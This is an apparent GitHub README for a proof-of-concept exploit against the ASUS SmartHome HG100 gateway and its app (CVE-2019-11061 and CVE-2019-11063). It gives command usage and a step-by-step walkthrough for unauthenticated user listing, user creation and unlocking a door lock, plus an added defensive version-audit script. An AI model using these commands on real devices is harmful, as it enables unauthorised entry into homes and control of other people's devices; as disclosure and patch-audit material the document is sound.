ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063

tim124058/ASUS-SmartHome-Exploit

ASUS-SmartHome-Exploit

CVE IDs

CVE-2019-11061 : Broken access control in HG100

Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09

CVE-2019-11063 : Broken access control in SmartHome app

Affected products : ASUS SmartHome Android APP version < 3.0.45_190701

Description

If the attacker is on the same internal network as the HG100 or a mobile device with the companion app (Android or iPhone), the attacker can send control requests to them.

The attacker then does not need any authentication to do the following:
1. Get all user names that have been added to the HG100.
2. Get information on all devices under the SmartHome Gateway (HG100).
3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.

The following requires a password (4 to 6 digits, default: "0000"):
1. Add users to the HG100.

Exploit usage:

Scan for the exploitable port:

usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

Send a command to the target:

usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Note: 2019/5/15 - ASUS released an update for the SmartHome app (3.0.42_190515) and Gateway (4.00.06) that added SSL to the HTTP service, but this vulnerability still exists. With this update, you need to specify the protocol when using the "cmd" argument. For example:
$ ./exploit.py cmd https://10.42.50.166:8083 -l
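
To check an inventory against the affected ranges listed under CVE IDs, including the 2019/5/15 interim releases from the note above, the following is an added example and not part of the original repository. The product keys, host names and sample inventory are constructed, and treating a missing build suffix as older than the fixed build is an assumption.

```python
import re

# Fixed versions, taken from the "Affected products" lines of this README.
FIXED = {
    "hg100_firmware": "4.00.09",      # CVE-2019-11061
    "android_app": "3.0.45_190701",   # CVE-2019-11063
}

def parse_version(text):
    """Parse '4.00.06' or '3.0.42_190515' into a comparable (numbers, build) tuple."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*(_\d+)?", text):
        raise ValueError(f"unrecognised version string: {text!r}")
    dotted, _, build = text.partition("_")
    # A missing build suffix sorts lowest, so an ambiguous entry is flagged
    # rather than silently passed (assumption made for this example).
    return tuple(int(p) for p in dotted.split(".")), int(build or 0)

def status(product, version):
    """Return 'affected', 'fixed' or 'unknown' for one inventory entry."""
    try:
        current = parse_version(version)
    except ValueError:
        return "unknown"
    return "affected" if current < parse_version(FIXED[product]) else "fixed"

def audit(inventory):
    """Return (host, product, version, status) for every entry not known fixed."""
    rows = [(h, p, v, status(p, v)) for h, p, v in inventory]
    return [row for row in rows if row[3] != "fixed"]

# Constructed sample inventory; host names are hypothetical.
INVENTORY = [
    ("gw-hall", "hg100_firmware", "4.00.06"),       # 2019/5/15 interim release
    ("gw-garage", "hg100_firmware", "4.00.09"),
    ("phone-a", "android_app", "3.0.42_190515"),    # 2019/5/15 interim release
    ("phone-b", "android_app", "3.0.45_190701"),
    ("phone-c", "android_app", "3.0.45"),           # build suffix missing
    ("phone-d", "android_app", "n/a"),
]

if __name__ == "__main__":
    for host, product, version, state in audit(INVENTORY):
        print(f"{host:10} {product:15} {version:15} {state}")
```
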

Use example:

Step1:

Scan a mobile device (with the companion app for Android or iPhone installed) for the exploitable port:
[Screenshot: app port]
P.S. The -v option will list the users that have been added to the HG100.

or

Scan the HG100 for the exploitable port:
[Screenshot: HG100 port]

Step2:

Get all users that have been added to the HG100:
[Screenshot: list user]

or add a new one:
[Screenshot: add user]

Note: use https://10.42.50.166:8083 for the "cmd" argument.
For example:

$ ./exploit.py cmd https://10.42.50.166:8083 -u

Step3:

Get information on all devices under the SmartHome Gateway:
[Screenshot: list device]
P.S. If the --user option is not set, the first user in the HG100 will be selected automatically (because no password is needed).

Compare with app:


Step4:

Control (unlock) the DoorLock:
[Screenshot: ctrl device]
P.S. The value 1028 comes from the -l option (Step 3).

Result:
